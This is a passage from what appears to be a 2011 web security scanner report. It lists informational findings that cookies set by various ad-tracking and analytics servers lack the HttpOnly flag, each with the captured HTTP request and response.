Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2417656649724524407

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2417656649724524407; Domain=.mediabrandsww.com; Expires=Sat, 05-Nov-2011 14:00:05 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:05 GMT

GIF89a.............!.......,...........D..;

10.52. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2931142961646634775

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3706692347515356359

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3706692347515356359; Domain=.p-td.com; Expires=Sat, 05-Nov-2011 14:00:05 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:05 GMT

GIF89a.............!.......,...........D..;

10.53. http://d.tradex.openx.com/ajs.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajs.php?zoneid=2650&cb=25141706899&charset=ISO-8859-1&loc=http%3A//www.surphace.com/ads/rubicon_orlandosentinel&referer=http%3A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=60d1502eb67392851be60a06ffe3ec9b

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=60d1502eb67392851be60a06ffe3ec9b; expires=Tue, 08-May-2012 14:00:00 GMT; path=/
Content-Length: 3804
Connection: close
Content-Type: text/javascript; charset=ISO-8859-1

var OX_70f8dde7 = '';
OX_70f8dde7 += "<"+"script type=\"text/javascript\">\n";
OX_70f8dde7 += "OXM_ad = {\"website\":\"dd81ea27-d6ee-482c-a1ae-66747444994b\",\n";
OX_70f8dde7 += "\"size\":\"468x60\",\
...[SNIP]...

10.54. http://d.tradex.openx.com/lg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=4945&campaignid=1660&zoneid=2650&loc=1&referer=http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel&cb=81ae8f794a&r_id=02eea6ce6a94fccf845961f4c7a8855c&r_ts=lkxlk0 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=60d1502eb67392851be60a06ffe3ec9b

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=60d1502eb67392851be60a06ffe3ec9b; expires=Tue, 08-May-2012 14:00:04 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.55. http://data.adsrvr.org/map/cookie/contextweb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.adsrvr.org
Path:   /map/cookie/contextweb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /map/cookie/contextweb HTTP/1.1
Host: data.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967

Response

HTTP/1.1 302 Found
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Cache-Control: private,no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Date: Mon, 09 May 2011 14:00:07 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=1cf8781b-f036-4ffe-a17c-988bc661e967
Pragma: no-cache
Set-Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967; domain=.adsrvr.org; expires=Wed, 09-May-2012 14:00:08 GMT; path=/
Set-Cookie: X-Mapping-fjhppofk=56D14B6C0CC14A5761E9A7895E1F89AF; path=/
Content-Length: 213

Redirecting to: <a href="http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=1cf8781b-f036-4ffe-a17c-988bc661e967">http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=1cf8781b-f036-4ffe-a17c-988
...[SNIP]...

10.56. http://data.cmcore.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?tid=17&ci=90074784&vn1=4.1.1&vn2=e4.0&ec=UTF-8&cm_mmc=IM_Display-_-x-_-x15off-_-postvday&cm_mmca1=300x250&cm_mmca2=300x250_8F_Interim_finalgif&cm_mmca3=postvday&cm_mmca4=25K&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:27 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90074784_login=1304949627001684455490074784; path=/
Set-Cookie: 90074784_reset=1304949627;path=/
Expires: Sun, 08 May 2011 20:00:27 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

10.57. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.irishtimes.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.irishtimes.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html&1nv0nd4 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=1304471550.60|1304471550.1OD|1304471550.1FE; dt=X; psc=4; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 456
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 14:04:32 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 14:04:32 GMT; Path=/
Set-Cookie: di=%7B%7D..1304949872.1FE|1304949872.1OD|1304949872.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 08:22:03 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 14:04:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 14:04:32 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099","http://cspix.media6degree
...[SNIP]...

10.58. http://edge.quantserve.com/quant.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.quantserve.com
Path:   /quant.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quant.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: edge.quantserve.com

Response

HTTP/1.1 200 OK
Connection: close
ETag: "20606:E0-713827831-1304949969580"
Vary: Accept-Encoding
Last-Modified: Mon, 09-May-2011 14:06:09 GMT
Content-Type: application/x-javascript
Set-Cookie: mc=4dc7f4d1-8dd66-3f1ef-84d25; expires=Mon, 09-May-2021 14:06:09 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 14:06:09 GMT
Date: Mon, 09 May 2011 14:06:09 GMT
Server: QS
Content-Length: 5265

if(!__qc){var __qc={qcdst:function(){if(__qc.qctzoff(0)!=__qc.qctzoff(6))return 1;return 0;},qctzoff:function(m){var d1=new Date(2000,m,1,0,0,0,0);var t=d1.toGMTString();var d3=new Date(t.substring(0,
...[SNIP]...

10.59. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f2nthevine.112.2o7.net
Path:   /b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343?[AQB]&ndh=1&t=9/4/2011%209%3A1%3A25%201%20300&ce=ISO-8859-1&cdp=3&pageName=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&g=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&cc=AUD&ch=index&events=event1&c1=index&v1=index&c2=index%3Anews&v2=index%3Anews&c6=article&v6=article&c7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&v7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&c8=TimByron&v8=TimByron&c14=New&v14=New&c21=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&c28=No%20cookie%20data&v28=No%20cookie%20data&c29=No%20cookie%20data&v29=No%20cookie%20data&c30=No%20cookie%20data&v30=No%20cookie%20data&x=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: f2nthevine.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:06:56 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_l8dx7Ebox7Ccdo=[CS]v4|0-0|4DC7F500[CE]; Expires=Sat, 7 May 2016 14:06:56 GMT; Domain=.112.2o7.net; Path=/
Location: http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343?AQB=1&pccr=true&&ndh=1&t=9/4/2011%209%3A1%3A25%201%20300&ce=ISO-8859-1&cdp=3&pageName=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&g=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&cc=AUD&ch=index&events=event1&c1=index&v1=index&c2=index%3Anews&v2=index%3Anews&c6=article&v6=article&c7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&v7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&c8=TimByron&v8=TimByron&c14=New&v14=New&c21=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&c28=No%20cookie%20data&v28=No%20cookie%20data&c29=No%20cookie%20data&v29=No%20cookie%20data&c30=No%20cookie%20data&v30=No%20cookie%20data&x=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:06:56 GMT
Last-Modified: Tue, 10 May 2011 14:06:56 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 0
Content-Type: text/plain


10.60. http://floridatoday.us.intellitxt.com/intellitxt/front.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://floridatoday.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intellitxt/front.asp?ipid=13767 HTTP/1.1
Host: floridatoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7NwEAAAEvvajK5QA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q9PsQA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:41 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q9PsQA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:41 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:41 GMT
Age: 0
Connection: keep-alive
Content-Length: 11706

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...

10.61. http://gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/1273144/0/0/ADTECH

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn/3.0/5111.1/1273144/0/0/ADTECH;cfp=1;rndc=130494958;alias=fl-brevard.flatoday.com/news/article.htm_Interstitial;cookie=info;loc=100;target=_blank;grp=24711;misc=1304949586599;size=0;noperf=1 HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slwalgreens=true; rsi_segs=D08734_70008|D08734_72078; CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Content-Length: 367
Set-Cookie: JEB2=4DC7E58B6E651A440C6EAF39F000181A;expires=Wed, 8 May 2013 13:59:47 GMT;domain=gannett.gcion.com;path=/

GEL.thepage.bannerManager.add({
id: 'inter',
disabled: true,
expiry: String ( 24 - (new Date()).getHours() + "H" )
});


var adcount_1273144_1_=new
...[SNIP]...

10.62. http://gannett.gcion.com/addyn/3.0/5111.1/896067/0/-1/ADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/896067/0/-1/ADTECH

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn/3.0/5111.1/896067/0/-1/ADTECH;cfp=1;rndc=130494958;alias=fl-brevard.flatoday.com/news/article.htm_728x90_1;cookie=info;loc=100;target=_blank;grp=24711;misc=1304949586596;size=728x90;noperf=1;key=Highly+publicized+murder+Caylee+Anthony+rivets+enrages;kvcw=;kvtitle=Highly-publicized-murder-of-Caylee-Anthony-rivets%2C-enrages HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slwalgreens=true; rsi_segs=D08734_70008|D08734_72078; CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: JEB2=4DC7E58B6E651A440C6EAF39F000181A;expires=Wed, 8 May 2013 13:59:48 GMT;domain=gannett.gcion.com;path=/
Content-Length: 874

document.write("\n");
document.write("<scr"+"ipt language=\"JavaScript\" src=\"http://a.collective-media.net/adj/q1.q.gc.6170/news;sz=728x90;ord=949588532?\" type=\"text/javascript\">\n");
document.wr
...[SNIP]...

10.63. http://gpaper114.112.2o7.net/b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gpaper114.112.2o7.net
Path:   /b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519?AQB=1&pccr=true&&ndh=1&t=9/4/2011%208%3A59%3A45%201%20300&pageName=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%28201105080108%29&g=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&cc=USD&server=SAXO-GEL&events=event3&v1=gpaper114&v5=local_news&c6=news&c7=local_news&c11=/article/20110508/NEWS01/105080319&c16=article&c17=news&c23=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&c24=floridatoday.com&c25=gpaper114&c29=1&c44=/article/20110508/NEWS01/105080319&c48=no%20segments&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: gpaper114.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|0-0|4DC7F352[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:48 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_nyhylx7B88x3D=[CS]v4|26E3F9AA051612A9-400001A680400F96|4DC7F352[CE]; Expires=Sat, 7 May 2016 13:59:48 GMT; Domain=.2o7.net; Path=/
